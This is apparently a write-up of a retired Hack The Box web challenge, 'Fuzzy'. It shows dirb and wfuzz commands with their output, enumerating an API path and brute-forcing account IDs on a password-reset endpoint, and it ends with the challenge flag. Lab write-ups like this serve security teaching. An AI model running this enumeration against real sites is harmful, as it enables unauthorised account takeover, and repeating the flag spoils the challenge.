Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.

Challenge info

Fuzzy [by Arrexel]
We have gained access to some infrastructure which we believe is connected to the internal network of our target. We need you to help obtain the administrator password for the website they are currently developing.

The challenge

Fuzzy - Homepage

Let’s use dirb to bruteforce some paths and let’s see if we find anything interesting:

$ dirb http://docker.hackthebox.eu:36338/ /usr/share/wordlists/fuzz-Bo0oM.txt -t -l
---- Scanning URL: http://docker.hackthebox.eu:36338/ ----
+ http://docker.hackthebox.eu:36338/%2e%2e//google.com (CODE:400|SIZE:166)
==> DIRECTORY: http://docker.hackthebox.eu:36338/api/
+ http://docker.hackthebox.eu:36338/api/ (CODE:200|SIZE:39)
+ http://docker.hackthebox.eu:36338/index.html (CODE:200|SIZE:4023)
+ http://docker.hackthebox.eu:36338/js/ (CODE:403|SIZE:564)

---- Entering directory: http://docker.hackthebox.eu:36338/api/ ----
+ http://docker.hackthebox.eu:36338/api/index.html (CODE:200|SIZE:39)

The api folder definitely looks interesting, let’s dig deeper. Files will most probably have the .php extension, so pass that to the -X parameter.

$ dirb http://docker.hackthebox.eu:36338/api/ /usr/share/wordlists/wfuzz/general/big.txt -X .php -t -l
---- Scanning URL: http://docker.hackthebox.eu:36338/api/ ----
+ http://docker.hackthebox.eu:36338/api/action.php (CODE:200|SIZE:24)

Since we’re probably looking for a credential or some user-related, I did some manual guessing on the action parameter(s). After testing login and register, I noticed reset returns a different response. Also note that the homepage (see screenshot above) made mention of the login/password reset function.

Fuzzy - API action reset

Now we need to find out what we want to reset.

We’re probably looking for a user id, so let’s try some numbers. Entering a few guesses results in “Account ID not found”.

Let’s fuzz some numbers, automation FTW!

$ wfuzz -z range,0-1000 --hs="Account ID not found" http://docker.hackthebox.eu:36338/api/action.php?reset=FUZZ

********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://docker.hackthebox.eu:36338/api/action.php?reset=FUZZ
Total requests: 1001

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                                                                      
===================================================================

000000021:   200        0 L      10 W     74 Ch       "20"                                                                                                                                                                         

Total time: 4.455422
Processed Requests: 1001
Filtered Requests: 1000
Requests/sec.: 224.6700

The flag

ID 20 apparently doesn’t return above-mentioned error message. Opening this in a browser, we get our flag 🙂

You successfully reset your password! Please use HTB{h0t_fuzz3r} to login.